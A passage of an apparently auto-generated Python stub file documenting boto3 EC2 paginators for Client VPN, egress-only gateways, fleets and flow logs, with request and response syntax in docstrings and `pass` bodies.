        :rtype: dict
        :returns:
        """
        pass
class DescribeClientVpnAuthorizationRules(Paginator):
    # Documentation-only stub: the full request/response contract lives in the
    # docstring; the body is `pass`, so calling it returns None.
    def paginate(self, ClientVpnEndpointId: str, DryRun: bool = None, Filters: List = None, PaginationConfig: Dict = None) -> Dict:
        """
        Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_client_vpn_authorization_rules`.
        See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeClientVpnAuthorizationRules>`_
        **Request Syntax**
        ::
          response_iterator = paginator.paginate(
              ClientVpnEndpointId='string',
              DryRun=True|False,
              Filters=[
                  {
                      'Name': 'string',
                      'Values': [
                          'string',
                      ]
                  },
              ],
              PaginationConfig={
                  'MaxItems': 123,
                  'PageSize': 123,
                  'StartingToken': 'string'
              }
          )
        **Response Syntax**
        ::
            {
                'AuthorizationRules': [
                    {
                        'ClientVpnEndpointId': 'string',
                        'Description': 'string',
                        'GroupId': 'string',
                        'AccessAll': True|False,
                        'DestinationCidr': 'string',
                        'Status': {
                            'Code': 'authorizing'|'active'|'failed'|'revoking',
                            'Message': 'string'
                        }
                    },
                ],
            }
        **Response Structure**
        - *(dict) --*
          - **AuthorizationRules** *(list) --*
            Information about the authorization rules.
            - *(dict) --*
              Information about an authorization rule.
              - **ClientVpnEndpointId** *(string) --*
                The ID of the Client VPN endpoint with which the authorization rule is associated.
              - **Description** *(string) --*
                A brief description of the authorization rule.
              - **GroupId** *(string) --*
                The ID of the Active Directory group to which the authorization rule grants access.
              - **AccessAll** *(boolean) --*
                Indicates whether the authorization rule grants access to all clients.
              - **DestinationCidr** *(string) --*
                The IPv4 address range, in CIDR notation, of the network to which the authorization rule applies.
              - **Status** *(dict) --*
                The current state of the authorization rule.
                - **Code** *(string) --*
                  The state of the authorization rule.
                - **Message** *(string) --*
                  A message about the status of the authorization rule, if applicable.
        :type ClientVpnEndpointId: string
        :param ClientVpnEndpointId: **[REQUIRED]**
          The ID of the Client VPN endpoint.
        :type DryRun: boolean
        :param DryRun:
          Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
        :type Filters: list
        :param Filters:
          One or more filters. Filter names and values are case-sensitive.
          - *(dict) --*
            A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
            * DescribeAvailabilityZones
            * DescribeImages
            * DescribeInstances
            * DescribeKeyPairs
            * DescribeSecurityGroups
            * DescribeSnapshots
            * DescribeSubnets
            * DescribeTags
            * DescribeVolumes
            * DescribeVpcs
            - **Name** *(string) --*
              The name of the filter. Filter names are case-sensitive.
            - **Values** *(list) --*
              The filter values. Filter values are case-sensitive.
              - *(string) --*
        :type PaginationConfig: dict
        :param PaginationConfig:
          A dictionary that provides parameters to control pagination.
          - **MaxItems** *(integer) --*
            The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
          - **PageSize** *(integer) --*
            The size of each page.
          - **StartingToken** *(string) --*
            A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
        :rtype: dict
        :returns:
        """
        pass
class DescribeClientVpnConnections(Paginator):
    # Documentation-only stub: the full request/response contract lives in the
    # docstring; the body is `pass`, so calling it returns None.
    def paginate(self, ClientVpnEndpointId: str, Filters: List = None, DryRun: bool = None, PaginationConfig: Dict = None) -> Dict:
        """
        Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_client_vpn_connections`.
        See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeClientVpnConnections>`_
        **Request Syntax**
        ::
          response_iterator = paginator.paginate(
              ClientVpnEndpointId='string',
              Filters=[
                  {
                      'Name': 'string',
                      'Values': [
                          'string',
                      ]
                  },
              ],
              DryRun=True|False,
              PaginationConfig={
                  'MaxItems': 123,
                  'PageSize': 123,
                  'StartingToken': 'string'
              }
          )
        **Response Syntax**
        ::
            {
                'Connections': [
                    {
                        'ClientVpnEndpointId': 'string',
                        'Timestamp': 'string',
                        'ConnectionId': 'string',
                        'Username': 'string',
                        'ConnectionEstablishedTime': 'string',
                        'IngressBytes': 'string',
                        'EgressBytes': 'string',
                        'IngressPackets': 'string',
                        'EgressPackets': 'string',
                        'ClientIp': 'string',
                        'CommonName': 'string',
                        'Status': {
                            'Code': 'active'|'failed-to-terminate'|'terminating'|'terminated',
                            'Message': 'string'
                        },
                        'ConnectionEndTime': 'string'
                    },
                ],
            }
        **Response Structure**
        - *(dict) --*
          - **Connections** *(list) --*
            Information about the active and terminated client connections.
            - *(dict) --*
              Describes a client connection.
              - **ClientVpnEndpointId** *(string) --*
                The ID of the Client VPN endpoint to which the client is connected.
              - **Timestamp** *(string) --*
                The current date and time.
              - **ConnectionId** *(string) --*
                The ID of the client connection.
              - **Username** *(string) --*
                The username of the client who established the client connection. This information is only provided if Active Directory client authentication is used.
              - **ConnectionEstablishedTime** *(string) --*
                The date and time the client connection was established.
              - **IngressBytes** *(string) --*
                The number of bytes sent by the client.
              - **EgressBytes** *(string) --*
                The number of bytes received by the client.
              - **IngressPackets** *(string) --*
                The number of packets sent by the client.
              - **EgressPackets** *(string) --*
                The number of packets received by the client.
              - **ClientIp** *(string) --*
                The IP address of the client.
              - **CommonName** *(string) --*
                The common name associated with the client. This is either the name of the client certificate, or the Active Directory user name.
              - **Status** *(dict) --*
                The current state of the client connection.
                - **Code** *(string) --*
                  The state of the client connection.
                - **Message** *(string) --*
                  A message about the status of the client connection, if applicable.
              - **ConnectionEndTime** *(string) --*
                The date and time the client connection was terminated.
        :type ClientVpnEndpointId: string
        :param ClientVpnEndpointId: **[REQUIRED]**
          The ID of the Client VPN endpoint.
        :type Filters: list
        :param Filters:
          One or more filters. Filter names and values are case-sensitive.
          - *(dict) --*
            A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
            * DescribeAvailabilityZones
            * DescribeImages
            * DescribeInstances
            * DescribeKeyPairs
            * DescribeSecurityGroups
            * DescribeSnapshots
            * DescribeSubnets
            * DescribeTags
            * DescribeVolumes
            * DescribeVpcs
            - **Name** *(string) --*
              The name of the filter. Filter names are case-sensitive.
            - **Values** *(list) --*
              The filter values. Filter values are case-sensitive.
              - *(string) --*
        :type DryRun: boolean
        :param DryRun:
          Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
        :type PaginationConfig: dict
        :param PaginationConfig:
          A dictionary that provides parameters to control pagination.
          - **MaxItems** *(integer) --*
            The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
          - **PageSize** *(integer) --*
            The size of each page.
          - **StartingToken** *(string) --*
            A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
        :rtype: dict
        :returns:
        """
        pass
class DescribeClientVpnEndpoints(Paginator):
    # Documentation-only stub: the full request/response contract lives in the
    # docstring; the body is `pass`, so calling it returns None.
    def paginate(self, ClientVpnEndpointIds: List = None, Filters: List = None, DryRun: bool = None, PaginationConfig: Dict = None) -> Dict:
        """
        Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_client_vpn_endpoints`.
        See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeClientVpnEndpoints>`_
        **Request Syntax**
        ::
          response_iterator = paginator.paginate(
              ClientVpnEndpointIds=[
                  'string',
              ],
              Filters=[
                  {
                      'Name': 'string',
                      'Values': [
                          'string',
                      ]
                  },
              ],
              DryRun=True|False,
              PaginationConfig={
                  'MaxItems': 123,
                  'PageSize': 123,
                  'StartingToken': 'string'
              }
          )
        **Response Syntax**
        ::
            {
                'ClientVpnEndpoints': [
                    {
                        'ClientVpnEndpointId': 'string',
                        'Description': 'string',
                        'Status': {
                            'Code': 'pending-associate'|'available'|'deleting'|'deleted',
                            'Message': 'string'
                        },
                        'CreationTime': 'string',
                        'DeletionTime': 'string',
                        'DnsName': 'string',
                        'ClientCidrBlock': 'string',
                        'DnsServers': [
                            'string',
                        ],
                        'SplitTunnel': True|False,
                        'VpnProtocol': 'openvpn',
                        'TransportProtocol': 'tcp'|'udp',
                        'AssociatedTargetNetworks': [
                            {
                                'NetworkId': 'string',
                                'NetworkType': 'vpc'
                            },
                        ],
                        'ServerCertificateArn': 'string',
                        'AuthenticationOptions': [
                            {
                                'Type': 'certificate-authentication'|'directory-service-authentication',
                                'ActiveDirectory': {
                                    'DirectoryId': 'string'
                                },
                                'MutualAuthentication': {
                                    'ClientRootCertificateChain': 'string'
                                }
                            },
                        ],
                        'ConnectionLogOptions': {
                            'Enabled': True|False,
                            'CloudwatchLogGroup': 'string',
                            'CloudwatchLogStream': 'string'
                        },
                        'Tags': [
                            {
                                'Key': 'string',
                                'Value': 'string'
                            },
                        ]
                    },
                ],
            }
        **Response Structure**
        - *(dict) --*
          - **ClientVpnEndpoints** *(list) --*
            Information about the Client VPN endpoints.
            - *(dict) --*
              Describes a Client VPN endpoint.
              - **ClientVpnEndpointId** *(string) --*
                The ID of the Client VPN endpoint.
              - **Description** *(string) --*
                A brief description of the endpoint.
              - **Status** *(dict) --*
                The current state of the Client VPN endpoint.
                - **Code** *(string) --*
                  The state of the Client VPN endpoint. Possible states include:
                  * ``pending-associate`` - The Client VPN endpoint has been created but no target networks have been associated. The Client VPN endpoint cannot accept connections.
                  * ``available`` - The Client VPN endpoint has been created and a target network has been associated. The Client VPN endpoint can accept connections.
                  * ``deleting`` - The Client VPN endpoint is being deleted. The Client VPN endpoint cannot accept connections.
                  * ``deleted`` - The Client VPN endpoint has been deleted. The Client VPN endpoint cannot accept connections.
                - **Message** *(string) --*
                  A message about the status of the Client VPN endpoint.
              - **CreationTime** *(string) --*
                The date and time the Client VPN endpoint was created.
              - **DeletionTime** *(string) --*
                The date and time the Client VPN endpoint was deleted, if applicable.
              - **DnsName** *(string) --*
                The DNS name to be used by clients when connecting to the Client VPN endpoint.
              - **ClientCidrBlock** *(string) --*
                The IPv4 address range, in CIDR notation, from which client IP addresses are assigned.
              - **DnsServers** *(list) --*
                Information about the DNS servers to be used for DNS resolution.
                - *(string) --*
              - **SplitTunnel** *(boolean) --*
                Indicates whether VPN split tunneling is supported.
              - **VpnProtocol** *(string) --*
                The protocol used by the VPN session.
              - **TransportProtocol** *(string) --*
                The transport protocol used by the Client VPN endpoint.
              - **AssociatedTargetNetworks** *(list) --*
                Information about the associated target networks. A target network is a subnet in a VPC.
                - *(dict) --*
                  Describes a target network that is associated with a Client VPN endpoint. A target network is a subnet in a VPC.
                  - **NetworkId** *(string) --*
                    The ID of the subnet.
                  - **NetworkType** *(string) --*
                    The target network type.
              - **ServerCertificateArn** *(string) --*
                The ARN of the server certificate.
              - **AuthenticationOptions** *(list) --*
                Information about the authentication method used by the Client VPN endpoint.
                - *(dict) --*
                  Describes the authentication methods used by a Client VPN endpoint. Client VPN supports Active Directory and mutual authentication. For more information, see `Authentication <https://docs.aws.amazon.com/vpn/latest/clientvpn-admin/authentication-authrization.html#client-authentication>`__ in the *AWS Client VPN Administrator Guide* .
                  - **Type** *(string) --*
                    The authentication type used.
                  - **ActiveDirectory** *(dict) --*
                    Information about the Active Directory, if applicable.
                    - **DirectoryId** *(string) --*
                      The ID of the Active Directory used for authentication.
                  - **MutualAuthentication** *(dict) --*
                    Information about the authentication certificates, if applicable.
                    - **ClientRootCertificateChain** *(string) --*
                      The ARN of the client certificate.
              - **ConnectionLogOptions** *(dict) --*
                Information about the client connection logging options for the Client VPN endpoint.
                - **Enabled** *(boolean) --*
                  Indicates whether client connection logging is enabled for the Client VPN endpoint.
                - **CloudwatchLogGroup** *(string) --*
                  The name of the Amazon CloudWatch Logs log group to which connection logging data is published.
                - **CloudwatchLogStream** *(string) --*
                  The name of the Amazon CloudWatch Logs log stream to which connection logging data is published.
              - **Tags** *(list) --*
                Any tags assigned to the Client VPN endpoint.
                - *(dict) --*
                  Describes a tag.
                  - **Key** *(string) --*
                    The key of the tag.
                    Constraints: Tag keys are case-sensitive and accept a maximum of 127 Unicode characters. May not begin with ``aws:`` .
                  - **Value** *(string) --*
                    The value of the tag.
                    Constraints: Tag values are case-sensitive and accept a maximum of 255 Unicode characters.
        :type ClientVpnEndpointIds: list
        :param ClientVpnEndpointIds:
          The ID of the Client VPN endpoint.
          - *(string) --*
        :type Filters: list
        :param Filters:
          One or more filters. Filter names and values are case-sensitive.
          - *(dict) --*
            A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
            * DescribeAvailabilityZones
            * DescribeImages
            * DescribeInstances
            * DescribeKeyPairs
            * DescribeSecurityGroups
            * DescribeSnapshots
            * DescribeSubnets
            * DescribeTags
            * DescribeVolumes
            * DescribeVpcs
            - **Name** *(string) --*
              The name of the filter. Filter names are case-sensitive.
            - **Values** *(list) --*
              The filter values. Filter values are case-sensitive.
              - *(string) --*
        :type DryRun: boolean
        :param DryRun:
          Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
        :type PaginationConfig: dict
        :param PaginationConfig:
          A dictionary that provides parameters to control pagination.
          - **MaxItems** *(integer) --*
            The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
          - **PageSize** *(integer) --*
            The size of each page.
          - **StartingToken** *(string) --*
            A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
        :rtype: dict
        :returns:
        """
        pass
class DescribeClientVpnRoutes(Paginator):
    # Documentation-only stub: the full request/response contract lives in the
    # docstring; the body is `pass`, so calling it returns None.
    def paginate(self, ClientVpnEndpointId: str, Filters: List = None, DryRun: bool = None, PaginationConfig: Dict = None) -> Dict:
        """
        Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_client_vpn_routes`.
        See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeClientVpnRoutes>`_
        **Request Syntax**
        ::
          response_iterator = paginator.paginate(
              ClientVpnEndpointId='string',
              Filters=[
                  {
                      'Name': 'string',
                      'Values': [
                          'string',
                      ]
                  },
              ],
              DryRun=True|False,
              PaginationConfig={
                  'MaxItems': 123,
                  'PageSize': 123,
                  'StartingToken': 'string'
              }
          )
        **Response Syntax**
        ::
            {
                'Routes': [
                    {
                        'ClientVpnEndpointId': 'string',
                        'DestinationCidr': 'string',
                        'TargetSubnet': 'string',
                        'Type': 'string',
                        'Origin': 'string',
                        'Status': {
                            'Code': 'creating'|'active'|'failed'|'deleting',
                            'Message': 'string'
                        },
                        'Description': 'string'
                    },
                ],
            }
        **Response Structure**
        - *(dict) --*
          - **Routes** *(list) --*
            Information about the Client VPN endpoint routes.
            - *(dict) --*
              Information about a Client VPN endpoint route.
              - **ClientVpnEndpointId** *(string) --*
                The ID of the Client VPN endpoint with which the route is associated.
              - **DestinationCidr** *(string) --*
                The IPv4 address range, in CIDR notation, of the route destination.
              - **TargetSubnet** *(string) --*
                The ID of the subnet through which traffic is routed.
              - **Type** *(string) --*
                The route type.
              - **Origin** *(string) --*
                Indicates how the route was associated with the Client VPN endpoint. ``associate`` indicates that the route was automatically added when the target network was associated with the Client VPN endpoint. ``add-route`` indicates that the route was manually added using the **CreateClientVpnRoute** action.
              - **Status** *(dict) --*
                The current state of the route.
                - **Code** *(string) --*
                  The state of the Client VPN endpoint route.
                - **Message** *(string) --*
                  A message about the status of the Client VPN endpoint route, if applicable.
              - **Description** *(string) --*
                A brief description of the route.
        :type ClientVpnEndpointId: string
        :param ClientVpnEndpointId: **[REQUIRED]**
          The ID of the Client VPN endpoint.
        :type Filters: list
        :param Filters:
          One or more filters. Filter names and values are case-sensitive.
          - *(dict) --*
            A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
            * DescribeAvailabilityZones
            * DescribeImages
            * DescribeInstances
            * DescribeKeyPairs
            * DescribeSecurityGroups
            * DescribeSnapshots
            * DescribeSubnets
            * DescribeTags
            * DescribeVolumes
            * DescribeVpcs
            - **Name** *(string) --*
              The name of the filter. Filter names are case-sensitive.
            - **Values** *(list) --*
              The filter values. Filter values are case-sensitive.
              - *(string) --*
        :type DryRun: boolean
        :param DryRun:
          Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
        :type PaginationConfig: dict
        :param PaginationConfig:
          A dictionary that provides parameters to control pagination.
          - **MaxItems** *(integer) --*
            The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
          - **PageSize** *(integer) --*
            The size of each page.
          - **StartingToken** *(string) --*
            A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
        :rtype: dict
        :returns:
        """
        pass
class DescribeClientVpnTargetNetworks(Paginator):
    # Documentation-only stub: the full request/response contract lives in the
    # docstring; the body is `pass`, so calling it returns None.
    def paginate(self, ClientVpnEndpointId: str, AssociationIds: List = None, Filters: List = None, DryRun: bool = None, PaginationConfig: Dict = None) -> Dict:
        """
        Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_client_vpn_target_networks`.
        See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeClientVpnTargetNetworks>`_
        **Request Syntax**
        ::
          response_iterator = paginator.paginate(
              ClientVpnEndpointId='string',
              AssociationIds=[
                  'string',
              ],
              Filters=[
                  {
                      'Name': 'string',
                      'Values': [
                          'string',
                      ]
                  },
              ],
              DryRun=True|False,
              PaginationConfig={
                  'MaxItems': 123,
                  'PageSize': 123,
                  'StartingToken': 'string'
              }
          )
        **Response Syntax**
        ::
            {
                'ClientVpnTargetNetworks': [
                    {
                        'AssociationId': 'string',
                        'VpcId': 'string',
                        'TargetNetworkId': 'string',
                        'ClientVpnEndpointId': 'string',
                        'Status': {
                            'Code': 'associating'|'associated'|'association-failed'|'disassociating'|'disassociated',
                            'Message': 'string'
                        },
                        'SecurityGroups': [
                            'string',
                        ]
                    },
                ],
            }
        **Response Structure**
        - *(dict) --*
          - **ClientVpnTargetNetworks** *(list) --*
            Information about the associated target networks.
            - *(dict) --*
              Describes a target network associated with a Client VPN endpoint.
              - **AssociationId** *(string) --*
                The ID of the association.
              - **VpcId** *(string) --*
                The ID of the VPC in which the target network (subnet) is located.
              - **TargetNetworkId** *(string) --*
                The ID of the subnet specified as the target network.
              - **ClientVpnEndpointId** *(string) --*
                The ID of the Client VPN endpoint with which the target network is associated.
              - **Status** *(dict) --*
                The current state of the target network association.
                - **Code** *(string) --*
                  The state of the target network association.
                - **Message** *(string) --*
                  A message about the status of the target network association, if applicable.
              - **SecurityGroups** *(list) --*
                The IDs of the security groups applied to the target network association.
                - *(string) --*
        :type ClientVpnEndpointId: string
        :param ClientVpnEndpointId: **[REQUIRED]**
          The ID of the Client VPN endpoint.
        :type AssociationIds: list
        :param AssociationIds:
          The IDs of the target network associations.
          - *(string) --*
        :type Filters: list
        :param Filters:
          One or more filters. Filter names and values are case-sensitive.
          - *(dict) --*
            A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
            * DescribeAvailabilityZones
            * DescribeImages
            * DescribeInstances
            * DescribeKeyPairs
            * DescribeSecurityGroups
            * DescribeSnapshots
            * DescribeSubnets
            * DescribeTags
            * DescribeVolumes
            * DescribeVpcs
            - **Name** *(string) --*
              The name of the filter. Filter names are case-sensitive.
            - **Values** *(list) --*
              The filter values. Filter values are case-sensitive.
              - *(string) --*
        :type DryRun: boolean
        :param DryRun:
          Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
        :type PaginationConfig: dict
        :param PaginationConfig:
          A dictionary that provides parameters to control pagination.
          - **MaxItems** *(integer) --*
            The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
          - **PageSize** *(integer) --*
            The size of each page.
          - **StartingToken** *(string) --*
            A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
        :rtype: dict
        :returns:
        """
        pass
class DescribeEgressOnlyInternetGateways(Paginator):
    # Documentation-only stub: the full request/response contract lives in the
    # docstring; the body is `pass`, so calling it returns None.
    def paginate(self, DryRun: bool = None, EgressOnlyInternetGatewayIds: List = None, PaginationConfig: Dict = None) -> Dict:
        """
        Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_egress_only_internet_gateways`.
        See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeEgressOnlyInternetGateways>`_
        **Request Syntax**
        ::
          response_iterator = paginator.paginate(
              DryRun=True|False,
              EgressOnlyInternetGatewayIds=[
                  'string',
              ],
              PaginationConfig={
                  'MaxItems': 123,
                  'PageSize': 123,
                  'StartingToken': 'string'
              }
          )
        **Response Syntax**
        ::
            {
                'EgressOnlyInternetGateways': [
                    {
                        'Attachments': [
                            {
                                'State': 'attaching'|'attached'|'detaching'|'detached',
                                'VpcId': 'string'
                            },
                        ],
                        'EgressOnlyInternetGatewayId': 'string'
                    },
                ],
            }
        **Response Structure**
        - *(dict) --*
          - **EgressOnlyInternetGateways** *(list) --*
            Information about the egress-only internet gateways.
            - *(dict) --*
              Describes an egress-only internet gateway.
              - **Attachments** *(list) --*
                Information about the attachment of the egress-only internet gateway.
                - *(dict) --*
                  Describes the attachment of a VPC to an internet gateway or an egress-only internet gateway.
                  - **State** *(string) --*
                    The current state of the attachment. For an internet gateway, the state is ``available`` when attached to a VPC; otherwise, this value is not returned.
                  - **VpcId** *(string) --*
                    The ID of the VPC.
              - **EgressOnlyInternetGatewayId** *(string) --*
                The ID of the egress-only internet gateway.
        :type DryRun: boolean
        :param DryRun:
          Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
        :type EgressOnlyInternetGatewayIds: list
        :param EgressOnlyInternetGatewayIds:
          One or more egress-only internet gateway IDs.
          - *(string) --*
        :type PaginationConfig: dict
        :param PaginationConfig:
          A dictionary that provides parameters to control pagination.
          - **MaxItems** *(integer) --*
            The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
          - **PageSize** *(integer) --*
            The size of each page.
          - **StartingToken** *(string) --*
            A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
        :rtype: dict
        :returns:
        """
        pass
class DescribeFleets(Paginator):
    def paginate(self, DryRun: bool = None, FleetIds: List = None, Filters: List = None, PaginationConfig: Dict = None) -> Dict:
        """
        Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_fleets`.

        See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeFleets>`_

        **Request Syntax**
        ::
          response_iterator = paginator.paginate(
              DryRun=True|False,
              FleetIds=[
                  'string',
              ],
              Filters=[
                  {
                      'Name': 'string',
                      'Values': [
                          'string',
                      ]
                  },
              ],
              PaginationConfig={
                  'MaxItems': 123,
                  'PageSize': 123,
                  'StartingToken': 'string'
              }
          )

        **Response Structure**

        Each page is a dict with a ``Fleets`` key containing a list of dicts, one per EC2 Fleet:

        - **ActivityStatus** *(string) --* The progress of the EC2 Fleet: ``error`` | ``pending-fulfillment`` | ``pending-termination`` | ``fulfilled``.
        - **CreateTime** *(datetime) --* The creation date and time of the EC2 Fleet.
        - **FleetId** *(string) --* The ID of the EC2 Fleet.
        - **FleetState** *(string) --* ``submitted`` | ``active`` | ``deleted`` | ``failed`` | ``deleted-running`` | ``deleted-terminating`` | ``modifying``.
        - **ClientToken** *(string) --* Unique, case-sensitive identifier you provide to ensure the idempotency of the request. For more information, see `Ensuring Idempotency <https://docs.aws.amazon.com/AWSEC2/latest/APIReference/Run_Instance_Idempotency.html>`__ . Constraints: Maximum 64 ASCII characters.
        - **ExcessCapacityTerminationPolicy** *(string) --* ``no-termination`` | ``termination``. Indicates whether running instances should be terminated if the target capacity of the EC2 Fleet is decreased below the current size of the EC2 Fleet.
        - **FulfilledCapacity** *(float) --* The number of units fulfilled by this request compared to the set target capacity.
        - **FulfilledOnDemandCapacity** *(float) --* The number of units fulfilled by this request compared to the set target On-Demand capacity.
        - **LaunchTemplateConfigs** *(list) --* The launch template and overrides. Each entry holds a **LaunchTemplateSpecification** *(dict)* (``LaunchTemplateId``, ``LaunchTemplateName``, ``Version``) and **Overrides** *(list of dicts)*, each override with ``InstanceType``, ``MaxPrice``, ``SubnetId``, ``AvailabilityZone``, ``WeightedCapacity``, ``Priority`` and ``Placement`` (``GroupName``).
        - **TargetCapacitySpecification** *(dict) --* The number of units to request: ``TotalTargetCapacity``, ``OnDemandTargetCapacity``, ``SpotTargetCapacity`` *(integers)* and ``DefaultTargetCapacityType`` (``spot`` | ``on-demand``).
        - **TerminateInstancesWithExpiration** *(boolean) --* Indicates whether running instances should be terminated when the EC2 Fleet expires.
        - **Type** *(string) --* ``request`` | ``maintain`` | ``instant``. Indicates whether the EC2 Fleet only requests the target capacity, or also attempts to maintain it. Default: ``maintain``.
        - **ValidFrom** / **ValidUntil** *(datetime) --* The start and end date and time of the request, in UTC format (for example, *YYYY* -*MM* -*DD* T*HH* :*MM* :*SS* Z). The default end date is 7 days from the current date.
        - **ReplaceUnhealthyInstances** *(boolean) --* Indicates whether EC2 Fleet should replace unhealthy instances.
        - **SpotOptions** *(dict) --* The configuration of Spot Instances in the fleet: ``AllocationStrategy`` (``lowest-price`` | ``diversified``), ``InstanceInterruptionBehavior`` (``hibernate`` | ``stop`` | ``terminate``), ``InstancePoolsToUseCount``, ``SingleInstanceType``, ``SingleAvailabilityZone``, ``MinTargetCapacity``.
        - **OnDemandOptions** *(dict) --* The allocation strategy of On-Demand Instances in the fleet: ``AllocationStrategy`` (``lowest-price`` | ``prioritized``), ``SingleInstanceType``, ``SingleAvailabilityZone``, ``MinTargetCapacity``.
        - **Tags** *(list) --* The tags for the EC2 Fleet resource, each a dict with ``Key`` and ``Value``.
        - **Errors** *(list) --* Information about the instances that could not be launched by the fleet. Valid only when **Type** is set to ``instant``. Each entry has ``LaunchTemplateAndOverrides`` (the launch template and overrides that were used), ``Lifecycle`` (``spot`` | ``on-demand``), ``ErrorCode`` and ``ErrorMessage``. For more information about error codes, see `Error Codes <https://docs.aws.amazon.com/AWSEC2/latest/APIReference/errors-overview.html.html>`__ .
        - **Instances** *(list) --* Information about the instances that were launched by the fleet. Valid only when **Type** is set to ``instant``. Each entry has ``LaunchTemplateAndOverrides``, ``Lifecycle`` (``spot`` | ``on-demand``), ``InstanceIds`` *(list of strings)*, ``InstanceType`` and ``Platform`` (``Windows`` for Windows instances; otherwise blank).

        :type DryRun: boolean
        :param DryRun:
          Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
        :type FleetIds: list
        :param FleetIds:
          The ID of the EC2 Fleets.
          - *(string) --*
        :type Filters: list
        :param Filters:
          The filters. Each filter is a dict with a **Name** *(string)* and **Values** *(list of strings)*; filter names and values are case-sensitive.
          * ``activity-status`` - The progress of the EC2 Fleet ( ``error`` | ``pending-fulfillment`` | ``pending-termination`` | ``fulfilled`` ).
          * ``excess-capacity-termination-policy`` - Indicates whether to terminate running instances if the target capacity is decreased below the current EC2 Fleet size (``true`` | ``false`` ).
          * ``fleet-state`` - The state of the EC2 Fleet (``submitted`` | ``active`` | ``deleted`` | ``failed`` | ``deleted-running`` | ``deleted-terminating`` | ``modifying`` ).
          * ``replace-unhealthy-instances`` - Indicates whether EC2 Fleet should replace unhealthy instances (``true`` | ``false`` ).
          * ``type`` - The type of request (``instant`` | ``request`` | ``maintain`` ).
        :type PaginationConfig: dict
        :param PaginationConfig:
          A dictionary that provides parameters to control pagination.
          - **MaxItems** *(integer) --* The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
          - **PageSize** *(integer) --* The size of each page.
          - **StartingToken** *(string) --* A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
        :rtype: dict
        :returns:
        """
        pass
class DescribeFlowLogs(Paginator):
    def paginate(self, DryRun: bool = None, Filters: List = None, FlowLogIds: List = None, PaginationConfig: Dict = None) -> Dict:
        """
        Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_flow_logs`.

        See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeFlowLogs>`_

        **Request Syntax**
        ::
          response_iterator = paginator.paginate(
              DryRun=True|False,
              Filters=[
                  {
                      'Name': 'string',
                      'Values': [
                          'string',
                      ]
                  },
              ],
              FlowLogIds=[
                  'string',
              ],
              PaginationConfig={
                  'MaxItems': 123,
                  'PageSize': 123,
                  'StartingToken': 'string'
              }
          )

        **Response Structure**

        Each page is a dict with a ``FlowLogs`` key containing a list of dicts, one per flow log:

